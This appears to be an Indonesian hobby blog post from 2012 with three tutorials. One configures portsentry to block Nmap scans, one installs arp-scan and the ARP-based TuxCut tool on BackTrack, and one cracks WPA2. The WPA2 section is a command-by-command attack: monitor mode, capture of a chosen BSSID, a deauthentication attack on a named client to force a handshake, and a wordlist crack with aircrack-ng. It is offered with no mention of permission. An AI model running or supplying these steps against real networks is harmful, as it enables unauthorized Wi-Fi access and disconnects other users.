Minggu, 30 September 2012

Menghindari Nmap

nih ada sedikit informasi bagi teman-teman yang punya hotspot or warnet yg menggunakan server linux/unix kan sering banget tuh hacker ngacoin jaringan kita ni ada sedikit tutor agar hacker ga bisa liad jaringan kita

h3ll0s@heXbl4nk:~#apt-get install portsentry

h3ll0s@heXbl4nk:~#/etc/init.d/portsentry start

Quote:$ sudo pico /etc/portsentry/portsentry.conf

Cari baris ini :

# 0 = Do not block UDP/TCP scans.

# 1 = Block UDP/TCP scans.

# 2 = Run external command only (KILL_RUN_CMD)

BLOCK_UDP="0"

BLOCK_TCP="0"

Ubah menjadi :

BLOCK_UDP="1"

BLOCK_TCP="1"

Dan juga pastikan baris ini aktif :

KILL_ROUTE="/sbin/route add -host $TARGET$ reject"


setelah di set, dia akan otomatis memblok mac hacker

Install TuxCut di BackTrack

Install tuxcut di BackTrack Download ARP Scan di sini ARP Scan

masuk terminal ctrl+alt+T

kemudian extrack file arp-scan dengan mengetikan

root@bt4#tar xzf arp arp-scan-1.7.tar.gz

root@bt4#cd arp-scan-1.7

root@bt4#./Configure

root@bt4#make

root@bt4#make check

root@bt4#make install

kemudian install Tux-Cut-3.2

root@bt4#dpkg -i TuxCut-3.2_all.deb


jika masih ga muncul coba di reboot dulu

cracking WPA2 dengan BackTrack

mohon maaf kalau ini ud ga jaman, cuma mau share aja ni tutor

1. siapkan segelas kopi dan sebatang rokok agar ga tegang :D..

2. masuk ke dekstop dengan perintah ~# startx

3. buka konsole dan ketikkan perintah :~# ifconfig -a Backtrack

4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)

5. :~# airmon-ng start wlan0 (tuk membuat virtual interface mode monitor)

6. :~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar) mon0 adalah interface virtual hasil dari airmon-ng tadi

7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0 (tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama 'test')

8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0 (aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)

-0 : mode serangan deAuthentication

1 : dilakukan sebanyak 1x deAuth

9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt

inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt

jika masih kurang mengerti silakan comment aja